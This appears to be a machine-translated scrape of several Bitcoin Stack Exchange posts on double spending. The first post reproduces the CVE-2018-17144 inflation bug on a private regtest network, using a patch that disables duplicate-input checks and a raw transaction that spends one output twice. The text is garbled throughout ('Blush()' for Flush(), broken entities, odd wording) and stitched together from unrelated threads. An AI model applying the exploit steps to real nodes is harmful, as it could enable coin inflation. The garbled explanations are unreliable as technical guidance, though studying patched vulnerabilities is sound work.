doublespend – reproduces CVE-2018-17144 (inflation error) in regtest for learning

I am reviewing the CVE-2018-17144 inflation vulnerability for learning. I think I reproduced the error in regtest. Is it a correct way to reproduce it? I want to know if I'm missing something about it.

Steps to reproduce:

I have 2 regtest nodes; bitcoindA, bitcoindB. Both versions are v0.16.2 and are connected to each other.

bitcoindA runs as a mining node with the following patch to accept an invalid transaction.

$ git diff
+++ b / src / consensus / tx_verify.cpp
@@ -181,6 +181,7 @@ bool CheckTransaction (const CTransaction & tx, CValidationState & state, bool fChe

// Check for duplicate entries: keep in mind that this check is slow, so we omit it in CheckBlock
+ fCheckDuplicateInputs = false;
if (fCheckDuplicateInputs) {
std :: set vInOutPoints;

[1] generate 2 addresses in bitcoindB. (to receive the invalid utxo)


[2] mining 101 blocks in bitcoindA

$ ./bitcoinA/src/bitcoin-cli -rpcuser = bitcoinrpc -rpcpassword = bitcoinrpcpass -rpcport = 16591 -regtest generate 101

[3] verify the expendable txid of the extracted block and a creation transaction with the txid. Duplex utxo are configured as follows.

$ ./bitcoinA/src/bitcoin-cli -rpcuser = bitcoinrpc -rpcpassword = bitcoinrpcpass -rpcport = 16591 -regtest createrawtransaction & # 39;[{"txid":"5214dc65e9c9d75550a29e9ef9773452d808c5fd0c56bfe396eb7c2d034f5778","vout":0},{"txid":"5214dc65e9c9d75550a29e9ef9773452d808c5fd0c56bfe396eb7c2d034f5778","vout":0}]& # 39; & # 39; {"2NBeTpfn57VpE4e167tFuEtc761jYX7t893": 99.99} & # 39;

[4] Signaling, emission and mining in bitcoinA. And then check utxo on bitcoinB.

$ ./bitcoinB/src/bitcoin-cli -rpcuser = bitcoinrpc -rpcpassword = bitcoinrpcpass -rpcport = 16592 -regtest listunspent

    "txid": "c885a3f8c0275424401d2793e69aa6bca81f7badbfc1755e18033e8801b74703",
    "vout": 0,
    "address": "2NBeTpfn57VpE4e167tFuEtc761jYX7t893",
    "account": "",
    "redeemScript": "00141c8746e62e30554790f9bd74eeea89f45bdd5e13",
    "scriptPubKey": "a914c9d76124901125aaf2a9b37d8e2d1103a9e5508387",
    "amount": 99.99000000,
    "confirmations": 1,
    "spendable": true,
    "solvable": true,
    "safe": true

[5] check if the previous utxo is possible to send to the generated address (2N2bb6idv8qsPULP2rqGYoC5yirvVos6YEU)

doublespend – How does the double expense of bitcoin affect the omni sets?

I have a question about omni layer and bitcoin double-gas. I would be very grateful if someone answered.

Suppose I made a transaction tx_1 in the bitcoin network from the X address to the Y address and one of the outputs and its amount (546 satoshi) of bitcoin were linked to the amount of N of the omni asset (for example, Tether). So I simply sent ownership of omni asset from the X address to the Y address. Then I bounced this amount of N with another amount of satoshi, which I had had before sending Omni tied with 546 satoshi in tx_1 to this address. And then I sent this amount of omni asset to another address Z doing transaction tx_2. Then, for some reason, transaction tx_1 was canceled (double expense). And I have a question in this case omni assets will belong to the address Z or X?

doublespend – What happens when 2 transactions with a double doubles the other reaches the same block?

I am going to interpret this question from a different angle: if a node receives a block with two transactions that spend the same entry, what transaction will return to mempool and which ones will it discard?

When a node receives a block that contains two or more transactions that pass the same entries, the block would be marked as invalid and would be removed completely. None of the transactions in that block would be considered confirmed and any transaction that was already in the mempool will remain there. A transaction was not in the mempool but was in the block will not be added to the mempool.

As such, when the node receives this invalid block and validates it, when it determines that it is invalid, it rolls the block and does nothing. It does not change the UTXO set and does not change the mempool. This means that if any of the conflicting transactions were in the mempool when the block is received, it will remain there. If there were none, none of those transactions will be added to mempool.

Then, if one of the conflicting transactions paid a higher rate, but the lowest rate transaction was already in the node's mempool, the lower rate transaction would remain in the mempool and the higher rate was thrown with the block.

The code for this behavior is here. ConnectBlock take one CCoinsViewCache which is a cache for the UTXO set. This cache only writes the changes that are made to you when your Blush() It's called a function ConnectBlock will return false because the block is not valid and, as such, this function will return here before Blush() You can call here. Therefore, no changes will be made to the UTXO set.

Also, that early return due to an invalid block means that the mempool update will not occur either. The call for the mempool update here will not be reached due to the early return and, therefore, the transactions that were in the mempool at the time the block was received will remain there, and those that were not in the mempool They will be thrown out together with the block.

doublespend: Why "double spending" can only happen if the attacker controls 51% (or more) of the computing power of the network?

Battery exchange network

The Stack Exchange network consists of 174 question and answer communities that include Stack Overflow, the largest and most reliable online community for developers to learn, share their knowledge and develop their careers.

Visit Stack Exchange